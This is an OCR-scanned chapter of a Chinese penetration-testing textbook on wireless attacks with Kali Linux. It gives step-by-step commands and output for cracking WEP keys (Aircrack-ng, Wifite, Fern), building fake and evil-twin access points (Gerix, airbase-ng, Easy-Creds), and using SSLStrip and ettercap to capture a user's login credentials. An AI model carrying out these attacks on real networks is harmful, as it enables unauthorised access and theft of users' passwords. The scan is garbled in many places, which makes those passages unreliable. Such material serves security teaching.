(17) 在 该 界面 单 击 Aircrack-ng-Decrypt WEP password 按钮 ， 将 显示 如 图 9.30 所 示 的 
界面 。 


(18) 从 该 界面 可 以 看 到 破解 WEP 加 密 密 码 共用 时 间 为 3 分 28 秒 。 当 抓 取 的 数据 包 
为 20105 时 ， 找 到 了 密码 ， 其 密码 为 abcde。 
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aircrack-Log.txt; read; " 


00:02:28] Tested 134401 keys (got 15095 IVs) 


vote) 
) OD(17664) 33(17 664) Aj ot 6D(17664) 


ailed, Next try with 

arting PTW attack vith 2 VS. 

KEY FOUN + 1 61:62:63:64:65 ] (ASCII: abcde ) 
ecrupted correctly: 10i 


图 9.30 ”破解 结果 


93.2 ”使 用 Gerix 创建 假 的 接 入 点 


使 用 Gerix 工具 可 以 创建 和 建立 一 个 假 的 接 入 点 (AP) 。 设 置 一 个 假 的 访问 点 ， 可 以 
户 骗 用户 访 问 这 个 访问 点 。 在 这 个 时 代 ， 人 们 往往 会 为 了 方便 而 这 样 做 。 连 接 开 放 的 无 线 
接 入 点 ， 可 以 快速 及 方便 地 发 送 电子 邮件 或 登录 社交 网 络 。 下 面 将 介绍 以 WEP 加 密 的 无 
线 网 络 为 例 ， 创 建 假 接 入 点 。 

使 用 Gerix 工具 创建 假 接 入 点 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 启动 Gerix 工具 。 ene ara 


root@kali:/usr/share/gerix-wifi-cracker# python gerix.py 


(2) 切 换 到 Configuration 选项 卡 。 在 该 界面 选择 无 线 接口 , il; Enable/Disable Monitor 
Mode 按钮 。 当 监听 模式 成 功 被 司 动 后 ， 单 击 Select Target Network 下 的 Rescan Networks 
按钮 。 

(3) 在 扫 摘 到 的 所 有 了 网络 中 ， 选 择 WEP 加 密 的 网 络 。 然 后 单 击 Fake AP 选项 上 下， 将 
显示 如 图 9.31 所 示 的 界面 。 


| m p m 
Gerix wifi cracker Lx 


Welcome Configuration WEP WPA Fake AP | Cracking Database Credits 


Welcome in Fake Access Point Control Panel 


Create Fake AP 


Access point ESSID: 


[honeypot 
A point ch L 
[12 
Cryptography tags Key in Hex (Ex. aabbccddee) or Empty: 
[] WEP (9 None © WPA © WPA2 
aabbccddee 
WPA/WPAZ2 types 
® WEP40 © TKIP O WRAP © CCMP O WEP1 


Options 


C AdHoc mode [] Hidden SSID [ Disable broadcast probes [ | Respond to all | 


17:24:49 - database reloaded: /root/.gerix-wifi-cracker/key-database.db [Success] 


Gerix IT 55:55. 


图 9.31 Fake AP 界面 
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(4 六 从 该 界面 可 以 看 到 默认 的 接 入 点 ESSID 为 honeypot。 现 在 将 honeypot 修改 为 
personalnetwork， 同 样 将 攻击 的 无 线 接口 的 channel 也 要 修改 。 修 改 后 如 图 9.32 所 示 。 


r 


Gerix wifi cracker 


| Welcome | Configuration | WEP | WPA | Fake AP Cracking | Database | Credits | 


Welcome in Fake Access Point Control Panel 


Create Fake AP 


^ 


|personalnetwork 


Access point channel: 


1 

Cryptography tags Key in Hex (Ex. aabbccddee) or Empty: 
Di WEP @ None © WPA O WPA2 lve 

WPA/WPA2 types | 
(€ WEP40 © TKIP © WRAP © CCMP O WEP1( 


Options 
[C] AdHoc mode [| Hidden SSID [] Disable broadcast probes [] Respond to all | 


| Start Fake Access Point 


ED 


[13:19:52 - Cracking WEP with aircrack launched (remember to save database's changes) |^] 
| 13:25:52 - Cracking WEP with aircrack Launched (remember to save database's changes) || | 
13:49:50 - Cracking WEP with aircrack launched (remember to save database's changes) 
| 13:52:17 - Cracking WEP with aircrack launched (remember to save database's changes) 


GeriX IT .55:55.. 


[9.32 创建 Fake AP 


(5) 以 上 信息 设置 完 后 ， 其 他 配置 保持 默认 设置 。 然 后 单 击 Start Fake Access Point 1Z 
钮 ， 将 显示 如 图 9.33 所 示 的 界面 。 


bash -c "airbase-ng -e personalnetwork -c 1 -w aab 


一 一 ^ | 


$313: 31 Created tap interface at 
31:31 Trying to set uL on ay to 1500 
d Trying ti ) 
31 Access Po zint with BS: SID € 08 1:10:7 7:08:53:43 started, 


图 9.33 ”局 动 假 接 入 点 


(6) 当 有 用 户 连 接 创建 的 personalnetwork AP 时 ， 该 界面 会 输出 如 下 所 示 的 信息 。 
17:32:34 Client 18:DC:56:F0:62:AF associated(WEP) to ESSID: "personalnetwork" 


以 上 信息 表示 ，MAC 地 址 18:DC:56:F0:62:AF 的 AP 正在 连接 personalnetwork. 
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94 使 用 Wifite 破解 无 线 网 络 


一 些 破解 无 线 网 络 程序 是 使 用 Aircrack-ng LHR, 并 添加 了 一 个 图 形 界 面 或 使 用 文本 
菜单 的 形式 来 破解 无 线 网 络 。 这 使 得 用 户 使 用 它们 更 容易 ， 而 且 不 需要 记 住 任何 命令 。 本 
节 将 介绍 使 用 命令 行 工具 Wifite， 来 扫描 并 攻击 无 线 网 络 。 

(1) 局 动 wifite。 执 行 命令 如 下 所 示 : 

root@kali:~# wifite 


SOZ © ". WiFite v2 (r85) 


ee () : : | E i automated wireless auditor 
E E 2 /和 is 
poe NA, ; ,' designed for Linux 
E / A es 
/ \ 


[+] scanning for wireless devices... 
[+] enabling monitor mode on wlanO... done 
[+] initializing scan (mon0), updates at 5 sec intervals, CTRL+C when ready. 
[0:00:03] scanning wireless networks. 0 targets and 0 clients found 


(2) 停止 扫描 无 线 网 络 ， 将 显示 如 下 所 示 的 信息 : 
NUM ESSID CH ENCR POWER WPS? CLIENT 


1 yzty 11 WPA2 59db wps client 
2 Test 1 WEP Sidb wps client 
3 TP-LINK D7118A 1 WPA2 35db wps 
4 CMCC-AUTO 
5 CMCC-AUTO WPA2 32db no client 
6 CMCC-AUTO 
7 
8 CMCC-AUTO 
9 

10 


1 
1 
11 
TP-LINK_1C20FA 6 WPA2 28db wps 
11 
CMCC-AUTO 6 


CMCC-LIU 6 WPA2 28db wps 
11 TP-LINK ZLICE 9  WPA2 2/db wps 
12 CMCC-AUTO 6 WPA2 2/db no client 
13 Tenda 462950 4 WPA 26db no 


[+] select target numbers (1-13) separated by commas, or ‘all’: 


从 以 上 信息 中 ， 可 以 看 到 扫描 到 13 个 无 线 接 入 点 。 
(3) 选择 攻击 的 目标 。 这 里 选择 第 二 个 无 线 接 入 点 ， 扎 是 使 用 WEP 方式 加 密 的 。 所 


[+] select target numbers (1-13) separated by commas, or ‘all’: 2 
[*] 1 target selected. 
[0:10:00] preparing attack "Test" (14:E6:E4:AC:FB:20) 
[0:10:00] attempting fake authentication (5/5)... failed 
[0:10:00] attacking "Test" via arp-replay attack 
[0:09:06] started cracking (over 10000 ivs) 
[0:09:00] captured 12492 ivs @ 418 iv/sec 
[0:09:00] cracked Test (14:E6:E4:AC:FB:20)! key: "6162636465" 
[*] 1 attack completed: 


EN 
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[*] 13/1 WEP attacks succeeded 
cracked Test (14:E6:E4:AC:FB:20), key: "6162636465" 


[+] disabling monitor mode on monO... done 
[*] quitting 


从 以 上 输出 信息 中 , 可 以 看 到 攻击 成 功 。 其 中 ，Test 无 线 接 入 点 的 密码 是 6162636465。 


9.$ 使 用 Easy-Creds 工具 攻击 无 线 网 络 


Easy-Creds 是 一 个 菜单 式 的 破解 工具 。 该 工具 允许 用 户 打 开 一 个 无 线 网 卡 ， 并 能 实现 
一 个 无 线 接 入 点 攻击 平台 。Easy-Creds 可 以 创建 一 个 欺 驴 访问 点 ， 并 作为 一 个 中 间 人 攻击 
类 型 运行 ， 进 而 分 析 用 户 的 数据 流 和 账户 信息 。 它 可 以 从 SSL 加 密 数 据 中 恢复 账户 。 本 节 
将 介绍 使 用 Easy-Creds 工具 攻击 无 线 网 络 。 

Easy-Creds 是 BackTrack5 中 的 一 部 分 。 在 Kali F, 默认 没有 安装 该 工具 。 有 所以， 需要 
先 安 装 Easy-Creds 工具 才 可 使 用 。 

【实例 9-3】 安装 Easy-Creds 工具 。 具 体操 作 步 又 如 下 所 示 。 

(1) 从 https://github.com/bravOhax/easy-creds 网 站 下 载 Easy-Creds 软件 包 ， 其 软件 包 名 
为 easy-creds-master.zip. 


(2) 解压 下 载 的 软件 包 。 执 行 命 令 如 下 所 示 : 


root@localhost:~# unzip easy-creds-master.zip 

Archive: easy-creds-master.zip 

bf9f00c08b1 e26d8ff44ef27c7bcf59d3122ebcc 

creating: easy-creds-master/ 

inflating: easy-creds-master/README 
inflating: easy-creds-master/definitions.sslstrip 
inflating: easy-creds-master/easy-creds.sh 
inflating: easy-creds-master/installer.sh 


从 输出 的 信息 中 ， 可 以 看 到 Easy-Creds 软件 包 被 解压 到 easy-creds-master 文件 中 。 从 
以 上 信息 中 ， 可 以 看 到 在 easy-creds-master 文件 中 有 一 个 installer.sh 文件 ， 该 文件 就 是 用 
来 安装 Easy-Creds 软件 包 的 。 

(3) 安装 Easy-Creds 软件 包 。 在 安装 Easy-Creds 软件 包 之 前 ， 有 一 些 依赖 包 需 要 安装 。 
这 些 依 赖 包 , 可 以 参考 easy-creds-master 文件 中 的 README 文件 安装 相关 的 依赖 包 。 然 后 ， 
安装 Easy-Creds 包 。 执 行 命令 如 下 所 示 : 


root@kali:~# cd easy-creds/ 
root@kali:~/easy-creds# /installer.sh 

lle Illa Ilis Illy Ill- [le Hir Ille llld llls || 

IL HL HE HE HE HE HE || HE | | li 


Version 3.7 - Garden of Your Mind 
Installer 
Please choose your OS to install easy-creds 
1. Debian/Ubuntu and derivatives 
2. Red Hat or Fedora 
3. Microsoft Windows 
4A Exe 


s s 
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Choice: 


以 上 信息 显示 了 ， 安 装 easy-creds 的 操作 系统 菜单 。 
(4) 这 里 选择 安装 到 Debian/Ubuntu， 输 入 编号 1， 将 显示 如 下 所 示 的 信息 : 


Choice: 1 


lle Illa Ills Illy Ill- [le Ilir Ille Hid Ills I| 
IL | HL HE HE HL | HE HL ME Il 


Version 3.7 - Garden of Your Mind 
Installer 
Please provide the path you'd like to place the easy-creds folder. [/opt] : 


# 选 择 安装 位 置 ， 本 例 中 使 用 默认 设置 


[*] Installing pre-reqs for Debian/Ubuntu... 

[*] Running 'updatedb' 

[-] cmake is not installed, will attempt to install... 
[*] cmake was successfully installed from the repository. 

[+] | found gcc installed on your system 

[+] | found g++ installed on your system 

[+] | found subversion installed on your system 

[+] | found wget installed on your system 

[+] | found libssl-dev installed on your system 

[+] | found libpcap0.8 installed on your system 

[+] | found libpcapO0.8-dev installed on your system 

[+] | found libssl-dev installed on your system 

[+] | found aircrack-ng installed on your system 

[+] | found xterm installed on your system 

[+] | found sslstrip installed on your system 

[+] | found ettercap installed on your system 

[+] | found hamster installed on your system 

[-] ferret is not installed, will attempt to install... 

[*] Downloading and installing ferret from SVN 


make[4]: Leaving directory '/tmp/ec-install/freeradius-server-2.1.11/doc/rfc 
make[3]: Leaving directory '/tmp/ec-install/freeradius-server-2.1.11/doc' 
make[2]: Leaving directory '/tmp/ec-install/freeradius-server-2.1.11/doc' 
make[1]: Leaving directory /tmp/ec-install/freeradius-server-2.1.11' 

[+] The patched freeradius server has been installed 

[+] | found asleap installed on your system 

[+] | found metasploit installed on your system 

[*] Running 'updatedb' again because we installed some new stuff 


...happy hunting! 

以 上 信息 显示 了 安装 Easy-Creds 包 的 详细 过 程 。 在 该 过 程 中 ， 会 检测 easy-creds 的 依 
赖 包 是 否 都 已 安装 。 如 条 没有 安 逆 ， 此 过 程 中 会 安装 。Easy-Creds 软件 包 和 安装 完成 后 ， 将 
显示 happy hunting! 信息 。 

【实例 9-4】 使 用 Easy-Creds 工具 破解 无 线 网 络 。 有 具体 操作 步骤 如 下 所 示 。 

(1) 启动 Easy-Creds 工具 。 执 行 命令 如 下 所 示 : 


root@localhost:~/easy-creds-master#./easy-creds.sh 


lle Illa Ills Illy Ill- Hie Ilir Ille Hid Ills || 
IL HL HL HE HE HL | HL HL IL I 


Version 3.8-dev - Garden of New Jersey 


* 294 。 
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At any time, ctrl+c to cancel and return to the main menu 
Prerequisites & Configurations 

Poisoning Attacks 

FakeAP Attacks 

Data Review 

Exit 

. Quit current poisoning session 

Choice: 


以 上 输出 的 信息 显示 了 Easy-Creds 工具 的 攻击 菜单 。 
(2) 这 里 选择 伪 AP 攻击 ， 输 入 编写 3。 将 显示 如 下 所 示 的 信息 : 
Choice: 3 


[le Illa Ilis Illy IIl- Hle Ilr Ille Hid Ills || 
IL | HL HE HL HL HL ML HL IL Il 


Version 3.8-dev - Garden of New Jersey 
At any time, ctri+c to cancel and return to the main menu 
1. FakeAP Attack Static 
2. FakeAP Attack Evil Twin 
3. Karmetasploit Attack 
4. FreeRadius Attack 
5. DoS AP Options 
6. Previous Menu 
Choice: 


以 上 输出 信息 显示 了 伪 AP 攻击 可 使 用 的 方法 。 
(3) 这 里 选择 使 用 静态 伪 AP 攻击 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 
Choice: 1 


lle Illa Ills Illy Ill- Hie Ilir Ille Hid Ills || 
ILL HL HE HL HL | | HL HL | | II 


Version 3.8-dev - Garden of New Jersey 
At any time, ctrl+tc to cancel and return to the main menu 
Would you like to include a sidejacking attack? [y/N]: N 


ANRWONSA 


# 是 否 想 要 包括 劫持 攻击 
Network Interfaces: 
ethO 00:0c:29:5f:34:4b IP:192.168.0.117 
wlanO 00:c1:40:76:05:6c 
Interface connected to the internet (ex. ethO): ethO # 选 择 要 连接 的 接口 
Interface Chipset Driver 
wlan0 Ralink RT2870/3070 rt2800usb - [phyO] 
Wireless interface name (ex. wlanO): wlanO # 设 置 无 线 接口 名 
ESSID you would like your rogue AP to be called, example FreeWiFi: wlan 

# 设 置 无 线 AP AY ESSID 
Channel you would like to broadcast on: 4 # 设 置 使 用 的 信道 
[*] Your interface has now been placed in Monitor Mode 
monO Ralink RT2870/3070 rt2800usb - [phyO] 
Enter your monitor enabled interface name, (ex: mon0): monO 

# 设 置 监听 模式 接口 名 
Would you like to change your MAC address on the mon interface? [y/N]: N 

# 是 否 修改 监听 接口 的 MAC 地 址 
Enter your tunnel interface, example at0: at0 # 设 置 隧道 接口 
Do you have a dhcpd.conf file to use? [y/N]: N # 是 否 使 用 dhcpd.conf 文件 


Network range for your tunneled interface, example 10.0.0.0/24: 10.0.0.0/24 
# 设 置 隧道 接口 的 网 络 范围 
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The following DNS server IPs were found in your /etc/resolv.conf file: 
«» 192.168.0.1 
Enter the IP address for the DNS server, example 8.8.8.8: 192.168.0.1 # 设 置 DNS 服务 器 
[*] Creating a dhcpd.conf to assign addresses to clients that connect to us. 
[*] Launching Airbase with your settings. 
[*] Configuring tunneled interface. 
[*] Setting up iptables to handle traffic seen by the tunneled interface. 
[*] Launching Tail. 
[*] DHCP server starting on tunneled interface. 


[ ok ] Starting ISC DHCP server: dhcpd. 
[*] Launching SSLStrip... 


[*] Launching ettercap, poisoning specified hosts. 
[*] Configuring IP forwarding... 

[*] Launching URLSnarf... 

[*] Launching Dsniff... 


设置 完 以 上 的 信息 后 ， 将 会 和 目 动 局 动 一 些 程序 。 儿 秒 后 ， 将 会 打开 几 个 有 效 窗口 ， 如 
图 9.34 所 示 。 


Airbase-NG TAR" 


p/ServerConnection. py", line 154, shutdown 


/tuisted/web/httr Ad , line 866, in finish 
onne was lost; ' 


DHCP: [34:C0:59;:EF;2F:F7] REQUEST 192.168.4,100 
DHCP: [34:00;59:EF:2F:F7] REQUEST 10,0,0,103 
DHCP: [10,0,0.1] : 1048 We 
HTTP : 131.253,61.96:90 - 


a-usionini, Obrpsnv-12&ct- Ma 
/&1c=2052% id=648 


图 9.34 有 效 的 窗口 


(4) SAW Pepe Wifi 接 入 点 时 ，Easy-Creds (A E 2/256 2«) ^ 9m 27 Wo —^ | IP 地 址 ， 并 

且 能 够 访问 互联 网 。 如 果 在 互联 网 上 访问 一 个 安全 网 址 时 ,该 工具 将 除去 SSL 并 删除 安全 
连接 并 在 后 全 运行 。 所 以 ， BEKES EES I Goa e PERS P AE o 如 图 9.34 所 
示 ， 捕 获 到 一 个 登录 http://www.live.com 网 站 的 用 户 名 和 密码 。 其 用 户 名 为 test@live.com,， 


"2055 
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窗 公 为 qwert. 
(5) 此 时 在 Easy-Creds 的 主 菜 单 中 选择 数据 恢复 ， 输 入 编号 4， 如 下 所 示 : 


At any time, ctri+c to cancel and return to the main menu 
Prerequisites & Configurations 

Poisoning Attacks 

FakeAP Attacks 

Data Review 

Exit 

. Quit current poisoning session 

Choice: 4 


(6) 选择 数据 恢复 后 ， 将 显示 如 下 所 示 的 信息 : 


ANRONSA 


lle Illa Ills Illy IIl- Ille Ilir Ille Hid Ills || 
IL | HL HE HL HL HE HL HL | Il 


Version 3.8-dev - Garden of New Jersey 
At any time, ctrl-c to cancel and return to the main menu 
1. Parse SSLStrip log for credentials 
2. Parse dsniff file for credentials 
3. Parse ettercap eci file for credentials 
4. Parse freeradius attack file for credentials 
5. Previous Menu 
Choice: 3 


以 上 信息 显示 了 可 用 证 书 的 方法 。 
CI) 这 里 选择 分 析 Ettercap eci 文件 ， 输 入 编号 3， 将 显示 如 下 所 示 的 信息 : 


[le Illa Ills Illy IIl- Ile Ilir Ille Hid [Ils || 
ILL HL HE HL HL HL ML HL IE Il 


Version 3.8-dev - Garden of New Jersey 

At any time, ctrl+tc to cancel and return to the main menu 

Ettercap logs in current log folder: 

Iroot/easy-creds-master/easy-creds-2014-07-24-1722/ettercap2014-07-24-1724.eci 

Enter the full path to your ettercap.eci log file: 

从 输出 信息 中 ， 可 以 看 到 Ettercap 日 志文 件 的 保存 位 置 。 

(8) 此 时 输入 ettercap.eci 日 志文 件 的 全 路 人 笃 。 这 里 只 需要 通过 复制 并 粘贴 提供 的 整个 
Ettercap EVAR HIE Y o WR Ata: 


Enter the full path to your ettercap.eci log file: /root/easy-creds-master/ 
easy-creds-2014-07-24-1722/ettercap2014-07-24-1724.eci 


得 入 以 下 路 径 后 ， 将 显示 如 图 9.35 所 示 的 界面 。 
Ettercap Accounts "78 


etterlog NG-0.7.4.2 copyright 2001-2005 ALoR & NaGA 


TCP 80 USER: test@live.com ASS? quert INFO: http 
n/login,srf?wa-wsianinl,O&rpsr 26ct-: &rver-z5,4,65455,0 


://login,live,cor g 
&wp=MBI_SSL_SHAREDèwreply=httpst//mail,live,com/m/&lc=2052&id=648 


图 9.35 恢复 的 数据 


«9g 
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(9 六 从 该 界面 可 以 清楚 的 看 到 ， 和 截获 的 客户 疹 用 户 信 息 及 登录 的 网 站 。 
9.6 在 树 毒 派 上 破解 无 线 网 络 


大 部 分 的 命令 可 以 正常 的 运行 在 BackTrackS 或 Kali 上 。 在 Kali 上 可 以 实现 的 无 线 渗 
Ewin, 在 树 每 派 上 也 可 以 运行 。 在 第 1 草 中 介绍 了 在 树 每 派 上 安 痛 Kali Linux 操作 系统 ， 
下 面 将 介绍 在 树 蕉 派 上 实现 无 线 攻 击 。 

(1) 在 树 每 派 上 使 用 ifconfig 命令 得 看 无 线 网 卡 是 否 被 识别 。 执 行 命令 如 下 所 示 : 


root@kali:~# ifconfig 
ethO Link encap:Ethernet HWaddr 00:0c:29:7a:59:75 
inet addr:192.168.0.112 Bcast:192.168.0.255  Mask:255.255.255.0 
inet6 addr: fe80::20c:29ff:fe7a:5975/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:240510 errors:0 dropped:0 overruns:0 frame:0 
TX packets:130632 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:275993519 (263.2 MiB) TX bytes:26073827 (24.8 MIB) 
lo Link encap:Local Loopback 
inet addr:127.0.0.1 Mask:255.0.0.0 
inet6 addr: ::1/128 Scope:Host 
UP LOOPBACK RUNNING MTU:65536 Metric:1 
RX packets:1706270 errors:0 dropped:0 overruns:0 frame:0 
TX packets:1706270 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen:0 
RX bytes:250361463 (238.7 MiB) TX bytes:250361463 (238.7 MiB) 
wlanO Link encap:Ethernet HWaddr 22:34:f7:f6:c1:d0 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


从 输出 的 信息 中 ， 看 到 有 一 个 名 为 wlan0 的 接口 。 这 表示 无 线 网 卡 已 被 识别 。 如 果 没 
有 看 到 类 似 信息 ， 执 行 如 下 命令 局 动 巨 线 网 络 ， 如 下 所 示 : 


root@kali:~# ifconfig wlanO up 
(2) 查看 无 线 网 卡 信息 。 执 行 命令 如 下 所 示 : 


root@kali:~# iwlist wlanO scanning 
wlanO Scan completed : 
Cell 01 - Address: 14:E6:E4:AC:FB:20 
Channel:1 
Frequency:2.412 GHz (Channel 1) 
Quality=62/70 Signal level=-48 dBm 
Encryption key:on 
ESSID:"Test" 
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s 
9 Mb/s; 12 Mb/s; 18 Mb/s 

Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s 
Mode:Master 
Extra:tsf=O000000339efb6a2 
Extra: Last beacon: 48ms ago 
IE: Unknown: 000454657374 


e 298 * 


BOR 无 线 网 络 渗透 测试 


IE: Unknown: 010882848B960C121824 
IE: Unknown: 030101 
IE: Unknown: 0706555320010D14 
IE: Unknown: 2A0100 
IE: IEEE 802.111/WPA2 Version 1 

Group Cipher : CCMP 

Pairwise Ciphers (1) : CCMP 

Authentication Suites (1) : PSK 
IE: Unknown: 32043048606C 
IE: Unknown: 2D1A2C0003FF000000000000000000000000000000 
0000000000000000 
IE: Unknown: 331A2C0003FF0000000000000000000000000000000 
0000000000000 
IE: Unknown: 3D1601001 1000000000000000000000000000000000 
00000 
IE: Unknown: 341601001 1000000000000000000000000000000000 
00000 
IE: WPA Version 1 

Group Cipher : CCMP 

Pairwise Ciphers (1) : CCMP 

Authentication Suites (1) : PSK 
IE: Unknown: DD180050F2020101030003A4000027A4000042435E 
0062322F00 
IE: Unknown: DD0900037F01010000FF7F 
IE: Unknown: DD800050F2041044A0001 101044000102103B0001031 
04700100000000000001000000014E6E4ACFB201021000754502D4C 
494E4B10230009544C2D57523734304E10240003312E30104200033 
12E301054000800060050F2040001 10110018576972656C65737320 
4E20526F757465722057523734304E 100800020086 103C000101 

Cell 09 - Address: DA:64:C7:2F:A0:FF 

Channel:11 
Frequency:2.462 GHz (Channel 11) 
Quality=36/70 Signal level=-74 dBm 


以 上 输出 了 的 信息 显示 了 无 线 网 卡 的 相关 信息 。 如 网 卡 MAC hub. fixi. JE. XE 


率 和 模式 等 。 


在 ， 


(3) 局 动 无 线 网 卡 为 监 昕 模式。 执行 命令 如 下 所 示 : 


root@kali:~# airmon-ng start wlanO 

Found 3 processes that could cause trouble. 

If airodump-ng, aireplay-ng or airtun-ng stops working after 
a short period of time, you may want to kill (some of) them! 
-e 


PID Name 

2618 NetworkManager 

28/0 wpa supplicant 

27052 dhclient 

Interface Chipset Driver 

wlanO Ralink RT2870/3070 rt2800usb - [phy16] 


(monitor mode enabled on monO) 


从 输出 的 信息 中 ， 可 以 看 到 无 线 接口 wlan0 已 启动 监听 模式 ， 其 监听 接口 为 mon0。 现 
就 可 以 使 用 该 接口 捕获 无 线 定理 与 控制 巾 。 
在 树 BET: 可 以 使 用 Wireshark 的 命令 行程 序 tcpdump 或 tshark 来 捕获 数据 。 如 果 


不 喜欢 在 命令 行 操 作 的 话 ， 可 以 使 用 Wireshark 的 图 形 界面 来 实现 。 


(1) 启动 Wireshark 工具 。 执 行 命令 如 下 所 示 : 


es 
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root@kali:~# wireshark & 


(2) 在 Wireshark 的 接口 列表 中 选择 mond 接口 ， 并 单 击 Start 按钮 ， 如 图 9.36 所 示 。 


Capture 
Interface List = Open 
E Live list of the capture interfaces Open a previously captured file 
(counts incoming packets) 
Open Recent: 
Start 
Choose one or more interfaces to capture from, then Start v Sample Captures 
^| A rich assortment of example captu 
S wlanO 3 
i 
=P ; ee v 
. u—————— '——— | |. 
Ready to load or capture No Packets Profile: Default 


图 9.36 选择 捕获 接口 
(3) 启动 Wireshark 捕获 后 ， 将 显示 如 图 9.37 所 示 的 界面 。 


ME abcpcapng [Wireshark 1.10.7 (v1.10.7-0-g6b931a1 from master-1.10)] 
File Edit View So Capture Analyze Statistic Telephony Tools Internals Help 


eeamaicoeBxditeescvaiE S AAA FBS eB 


Filter: | wlanifcitype zc 加 Expression... Clear Apply Save 


o. Time Source ~ Destination Protocol Length Info 


106 43.166853000 KingjonD 20:22:92 Broadcast 802.11 64 Probe Request, SN-3076, FlagSs= rr Y. . SSID-Test 

107 43.170459000 Tp-LinkT ac:fb:20 KingjonD_20:22:92 802.11 407 Probe Response, SN-903, , Flags- 3 , SSID-Test 
108 43.174220000 Tp-LinkT ac:fb:20 KingjonDp 20:22:92 802.11 407 Probe Response, SN-904, i Fg , SSID=Test 
109 43.406340000 Tp-LinkT ac:fb:20 KingjonD_20:22:92 802.11 407 Probe Response, SN-907, , Flags= 4 , SSID-Test 
116 49. 260065000 Tp-LinkT ac:fb:20 Kingjonpb 20:22:92 802. 11 407 Probe Response, SN-965, , Flags= Re ! SSID-Test 
117 49.263R36000 Tni inkT ac:fh-20 Kkinaionn 20:22:92 802.11 407 Prahe Resnonse. SN=966. ` 5 Rz x ). SSTD-Test ~ 
1 ————————ÁüOwUweseünQ—X!!—-————————————— t 


e taf File: "C:\Users\lyw\Desktop\abc.pcapng” 47 kB 00:0... | Packets: 204 - Displayed: 76 (37.396) * Load time: 0:00.022 Profile: Default 
图 9.37 捕获 的 无 线 数据 包 


(4) 在 该 界面 可 以 看 到 106 帧 是 客户 端 发 送 Probe Reques 包 ， 请 求 连接 路 由 器 。107 
巾 路 由 器 发 送 Probe Response 包 ， 啊 应 了 客户 疹 的 请 求 。 

从 以 上 信息 中 ， 可 以 看 到 使 用 隐藏 SSID 并 不 意味 着 是 一 个 安全 的 网 络 。 在 Wireshark 
中 ， 使 用 MAC 地 址 过 滤 也 不 是 最 有 效 的 方法 。 这 里 可 以 使 用 airodump 命令 监听 一 个 无 线 
接 入 点 ， 获 取 到 连接 该 接 入 点 的 任何 设备 MAC 地 址 。 语 法 格式 如 下 所 示 : 

airodump-ng -c 无 线 AP 的 信道 -a bssid(AP 的 MAC 地 址 ) monO 

当成 功 获取 客户 端的 MAC 地 址 时 ， 用 户 只 需 使 用 macchanger 命令 将 目 己 无 线 网 卡 的 
MAC 地 址 修改 为 客户 端的 MAC 地 址 ， 即 可 成 功 连接 到 网 络 。 

【实例 9-5] 使 用 Fem WiFi Cracker 工具 攻击 ， 在 树 莓 派 上 攻击 WEP 和 WPA/WPA2 
ERN. HAERE RU FETZ o 

(1) 启动 Fern WiFi Cracker 工具 。 执 行 命令 如 下 所 示 : 


root@kali:~# fern-wifi-cracker 
执行 以 上 命令 后 ， 将 显示 如 图 9.38 所 示 的 界面 。 
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Fern WIFI Cracker 


QJ 


Fern WIFI Cracker 1.9 WPA Detection Status 
LI 


Currently installed version: Revision 94 


No Key Entries 


Python Version: 2.7.3 default 
Aircrack Version: Aircrack-ng 1.2 betal 


Qt Version: 4.9.3 


About Fern WIFI Cracker 
GUI suite for wireless encryption strength testing of 802.11 wireless encryption standard access points 


Written by Saviour Emmanuel Ekiko Report Bugs at : savioboyz @ rocketmail .com 


图 9.38 Fern WiFi Cracker 主 界面 


(2) 在 该 界面 选择 无 线 网 络 接口 ， 并 单 击 Scan for Access points 图 标 扫 摘 无 线 网 络 ， 


如 图 9.39 所 示 。 


Fern WIFI Cracker 


Fern WIFI Cracker 1.9 


Urwble to check for updates metwork timeout 


H Key Database No Key Entries 
Aircrack Version: Aircrack-ng 1.2 betal 
Qt Version: 4.9.3 ToolBox 


About Fern WIFI Cracker 


Python Version: 2.7.3 default 


GUI suite for wireless encryption strength testing of 802.11 wireless encryption standard access points 


Written by Saviour Emmaruel Ekiko Report Bugs at: savioboyz @rocketmail com 


图 9.39 扫描 无 线 网 络 
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(3 六 在 该 界面 选择 WiFi WEP 或 WiFi WPA 图 标 ， 将 显示 如 图 9.40 所 示 的 界面 。 


Attack Panel 


图 9.40 选择 攻击 目标 


(4) 在 该 界面 选择 攻击 目标 。 然 后 单 击 WiFi Attack 按钮 ， 开 始 攻 击 ， 如 图 9.41 所 示 。 


Attack Panel 


图 9.41 正在 攻击 


(50 从 该 界面 可 以 看 到 ， 已 捕获 到 6556 个 数据 包 。 当 捕获 到 大 约 2 万 个 包 时 ， 将 会 
RE FAS. {AE UCIT AA St, ie BEI HY SE FF o 
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9.7 攻击 路 由 器 


前 面 介绍 的 各 种 工具 ， 都 是 通过 直接 人 破解 密码 ， 来 连接 到 无 线 网 络 。 由 于 在 一 个 无 线 
网 络 环境 的 所 有 议 备 中 ， 路 由 器 是 最 重要 的 设备 之 一 。 通 第 用 户 为 了 保护 路 由 需 的 安全 ， 
通 弟 会 设置 一 个 比较 复杂 的 密码 。 甚 至 一 些 用 户 可 能 会 使 用 路 由 器 的 默认 用 户 名 和 密码 。 
但 是 ， 路 由 器 本 身 就 存在 一 些 漏洞 。 如 果 用 户 觉 得 对 复杂 的 密码 看 手 可 能 不 太 容 易 。 这 时 
候 ， 就 可 以 利用 路 由 器 上 自身 存在 的 漏洞 实施 攻击 。 本 节 将 介绍 使 用 Routerpwn 工具 实施 攻 
rr Bt FH Ait o 

Routerpwn 可 能 是 使 用 起 来 最 容易 的 一 个 工具 。 它 用 来 查看 路 由 器 的 漏洞 。Routerpwn 
不 包括 在 Kali 中 ， 它 只 是 一 个 网 站 。 其 官网 地 址 为 http:/routerpwn.comy/。 访 网 站 提供 的 漏 
洞 涉 及 很 多 广 商 的 路 由 器， 如 图 9.42 所 示 。 


2Wire 
3Com 
Arris 
